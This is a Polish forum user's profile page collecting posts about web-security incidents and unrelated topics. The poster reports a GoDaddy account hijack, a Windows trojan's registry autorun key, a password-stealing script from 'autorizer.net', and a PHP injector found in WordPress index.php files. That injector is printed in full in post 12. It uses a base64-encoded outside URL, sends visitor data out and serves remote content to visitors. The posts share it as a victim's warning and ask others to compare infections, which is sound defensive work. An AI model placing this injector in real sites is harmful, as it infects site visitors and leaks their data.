Jump to content

papieros

Forumowicze
  • Content Count

    1,597
  • Joined

  • Last visited

Community Reputation

0 Neutral
  1. Dzięki za odpowiedzi. Specjalnie mi to nie przeszkadza więc na razie blokować nie potrzebuje, pytałem raczej z ciekawości. Reaserch pokazuje, że FB ściąga sobie masowo grafikę z lajkowanych stron. To prawdopodobnie roboty zasysające obrazki. Jakby ktoś chciał blokować, czy dowiedzieć się troszku więcej to tu dyskusja na ten temat: http://www.webmasterworld.com/search_engine_spiders/4370124.htm
  2. Od wczoraj obserwuje szaleństwo wejść na strony z IP 69.171.... . Jak łatwo się doszukać te adresy należą do Facebook'a, czy ktoś wie po co Fejs wysyła tyle robotów?
  3. Jest, namierzyłem sk...syna Siedzi w: C:\Users\[nazwa-uzytkownika]\AppData\Roaming\Taoz\udaz.exe Startuje z rejestru HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run klucz: Wuodypumyq wartość: ścieżka jak wyżej Żeby go usunąć należy najpierw skasować plik udaz.exe albo zmienić nazwę, zrestartować komp i usunąć klucze z rejestru. Jakiś proces startowany przez udaz.exe odświeża rejestr i samo usunięcie z Run;a nic nie daje
  4. @makuriusz182 żadnych podejrzanych procesów nie widzę, usług też nie. Gdzieś to cholerstwo musi siedzieć ale nie mam pojęcia gdzie
  5. Strona jest czysta, to przeglądarka zmienia stronę (dopisuje kod). Wtyczki, dodatki powyłączane, a skanowałem cały komp i nic
  6. Przeglądam stronę www na kilku przeglądarkach, na FF i IE źródło strony jest inne, niż na Chromie, FF i Operze. Problem jest poważny bo dodany kod prawdopodobnie kradnie hasła (pisałem o tym tu) Czy ktoś się orientuje gdzie szukać tego syfu, który modyfikuje stronę przed załadowaniem do przeglądarki? Wszystkie dodatki powyłączałem, dalej ten syf siedzi. Skanowałem trzema antywirusami, żaden nic nie pomógł
  7. Wczoraj pisałem, że strony https ładują mi się bardzo wolno. Znalazłem przyczynę. W FF i IE przy ładowaniu strony szyfrowanej przeglądarki łączą się ze stroną "autorizer.net" i prawdopodobnie jest to strona wykradająca hasła. W źródle strony, zaraz za tytułem <title> widać podłączony skrypt odwołujący się do src="secure6.autorizer.net". Dziś już strony ładują się szybko ale to gó**o dalej siedzi. Sprawa wydaje się świeża bo w necie nie ma info o kłopotach z autorizer.net. Dla bezpieczeństwa, popatrzcie, przed zalogowaniem się oczywiście, czy w źródle strony szyfrowanej (adres zaczynający się od https) nie macie odwołania do 'autorizer.net' Więcej, tak na szybko, napisałem tu http://www.wvista.pl/index.php/2013/03/autorizer-net-uwaga-prawdopodobnie-kradnie-hasla/
  8. Dziś od rana wszystkie połączenia idące ssl'em (https) działają mi powoli jak cholera, cała reszta jest ok. Czy u Was jest podobnie, czy to u mnie jakiś problem. Jeśli to problem ogólny, to jeszcze jakoś ok ale obawiam się, że być może przyplątało mi się jakieś cholerstwo, które próbuje skanować to połączenia - antywiry na razie niczego nie wykrywają. Z góry dzięki za info.
  9. papieros

    allegro

    Faktycznie, padło
  10. Dziś na swoim koncie w GoDaddy, z podpiętą kartą kredytową znalazłem 12 domen kupionych nie przeze mnie. Zakupy dokonano 2,3 i 4 lutego. Nie wiem, czy to był włam na tylko moje konto, czy to jakiś większy wyciek. Sprawdźcie swoje konta na GD. Podpowiedź co można zrobić (nie wiem, czy to optymalne rozwiązanie, ja tak zrobiłem) 1). Cancel purchase (da się to zrobić w panelu produktów, co prawda jest komunikat, że nie jest to równoznaczne ze zwrotem kosztów ale zobaczymy) 2) Zmiana danych Karty. Nie da się jej zdeaktywować (chyba, ja nie potrafiłem) ale można zmienić imię, nazwisko, datę ważności 3) Mail do supportu GoDaddy (na razie bez odpowiedzi) 4) Tel. do operatora karty. Zakwestionowali transakcje (jeszcze nie były zaksięgowane). Poradzili, żeby karty na razie nie blokować ale jeśli pojawią się jakieś lewe transakcje, to dzwonić do nich. 5) No i oczywiście zmiana hasła do konta
  11. Cossack, dzięki, tamten temat przeoczyłem. Jakby co to, z tego co udało mi się wyszukać, jedną z możliwych przyczyn jest rzeczywiście stara wersja timthumb.php Tu opis po angielsku: http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/ PS. ale pytanie, czy to jedyna dziura, ja u siebie tego timthumba nie widzę ... ale jeszcze szukam
  12. No i mnie się nie upiekło, przykleił mi się oto taki kod w index.php <?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> Genruje toto jakiegoś trojana na stronie i przykeleja się UWAGA!!! do wszystkich (niekoniecznie wordpressowych) plików index.php w katalogu głównym i podkatalogach pierwszego poziomu zaraz za pierwszym kodem php w pliku. Przyczepiło mi się do dwóch serwerów (sic!!!), na których postawionych jest kilka wordpressów (niestety różne wersje), prawdopodobnie wlazło albo przez jakąś starą wersję WP albo przez którąś z wtyczek lub templatów. Ponieważ u mnie to wystąpiło na dwóch serwerach, radzę przejrzeć swoje strony. Uwaga, trojan wygenerowany przez ten kod, był widoczny tylko na jednej stronie, a więc jego obecność może być niezauważalna przez zerknięcie w sam html, trzeba zajrzeć do php. Może jak ktoś znajdzie też u siebie ten kod, to wspólnie, porównując wersje WP i zainstalowane dodatki, postaramy się namierzyć którędy to draństwo włazi. PS. Sprawa w miarę świeża, u mnie pliki zostały zmodyfikowane 25.11.2012 o 17:01
  13. Kiedyś, doraźnie, zastosowałem zwykłą świeczkę - działała pięknie. Podejrzewam, że równie dobrze jak lampa, za to oszczędniej Wada jest oczywiście taka, że świeca się kończy i wtedy komary gryzą ale przynajmniej w czasie zasypiania nie bzyczą nad uchem. A co do moskitiery, można ją przecież rozpiąć na stelażu, dajmy na to z listewek, i zdejmować z okna w razie potrzeby
  14. Dzięki, w związku z tą jakością, to może ktoś może wie jakiej firmy najlepiej kupić na próbę, tak aby się od razu nie zrazić?
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. Terms of Use Privacy Policy